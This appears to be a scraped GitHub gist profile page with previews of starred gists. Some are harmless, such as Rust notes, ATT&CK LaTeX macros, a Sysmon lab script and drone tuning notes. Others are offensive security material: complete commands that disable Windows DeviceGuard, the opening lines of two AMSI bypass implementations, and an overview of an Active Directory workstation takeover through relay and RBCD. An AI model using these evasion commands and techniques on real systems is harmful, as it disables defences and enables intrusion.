Skip to content

Instantly share code, notes, and snippets.

View Saltinbank-SyS's full-sized avatar
💭
On travaille en binôme car on est deux dans ma tête ...

Computer button pusher // Autodidact since my childhood || SIN - SIN HACK - HACK || NO-CODE evangelist || Skiddie learning REDTEAMING - Black coffee like my sense of humor Saltinbank-SyS

💭
On travaille en binôme car on est deux dans ma tête ...
559 followers · 1.1k following
View GitHub Profile
@noxasaxon
noxasaxon / learning_rust.md
Last active April 5, 2025 12:04
Learn Rust!
@LuemmelSec
LuemmelSec / disabledevicegard.ps1
Created December 1, 2022 08:51
Disable DeviceGuard with UEFI lock
# Steps needed to disable DeviceGuard with UEFI lock
# Disable DeviceGuard in registry
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f'
# Change UEFI settings. Reboot and confirmation needed.
mountvol X: /s
@CCob
CCob / patchless_amsi.h
Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@Purp1eW0lf
Purp1eW0lf / Sysmon_Lab.ps1
Last active December 16, 2024 16:16
<#
Meta
Date: 2022 March 28th
Updated: 2023 October 6th
Authors: Dray Agha (Twitter @purp1ew0lf), Dipo Rodipe (Twitter @dipotwb)
Company: Huntress Labs
Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab.
#>
################################################################################################################
@wietze
wietze / mitre_attack.tex
Created January 31, 2022 18:29
MITRE ATT&CK - LaTeX functions
\usepackage{hyperref}
\usepackage{xstring}
\DeclareRobustCommand{\tid}[1]{\StrSubstitute{#1}{.}{/}[\temp]%
\href{https://attack.mitre.org/techniques/\temp/}{#1}}
% \tid{T1234} returns 'T1234' with a hyperlink to its MITRE ATT&CK page
\DeclareRobustCommand{\tidtext}[1]{\StrSubstitute{#1}{.}{/}[\temp]%
\href{https://attack.mitre.org/techniques/\temp/}{#1}: \gettid{#1}}
% \tidtext{T1234} returns 'T1234: Technique Name' with T1234 containing a hyperlink to its MITRE ATT&CK page
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active March 17, 2025 03:05
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@exocode
exocode / Quadcopter.md
Created January 3, 2021 19:55
My personal cheat sheet for UAV FPV and Betaflight. Everything you need!

Quadcopter and Betaflight cheat sheet

Introduction

On my yourney though hundreds of videos, tutorials and manuals (Bardwell, UAV Tech, JohnnyFPV, Mr. Steele, Le Drib, RotorRiot (sorry, for the missed ones) and wrote down their suggestions). This is the result of my notes. It should provide the least necessary but most compressed information to start tuning and setting your Quadcopter. In my case I use the widely spread Taranis X7 remote control.

I am a freestyle pilot, so keep in mind, that these settings are in this scope (more smooth, softer flight behaviour).

Remote Control (Taranis X7)

@prinsharma1999
prinsharma1999 / bbprograms.txt
Created December 5, 2020 16:31
Saved from https://gist.github.com/onurcyukruk/5e70bd1f16d0428a34aed08d4cff0773
google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue
@mohanpedala
mohanpedala / 1-way-ssl.jpg
Last active November 23, 2023 17:44
One-Way SSL and Two-Way SSL
1-way-ssl.jpg
@FatRodzianko
FatRodzianko / my-am-bypass.ps1
Last active February 7, 2025 22:31
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]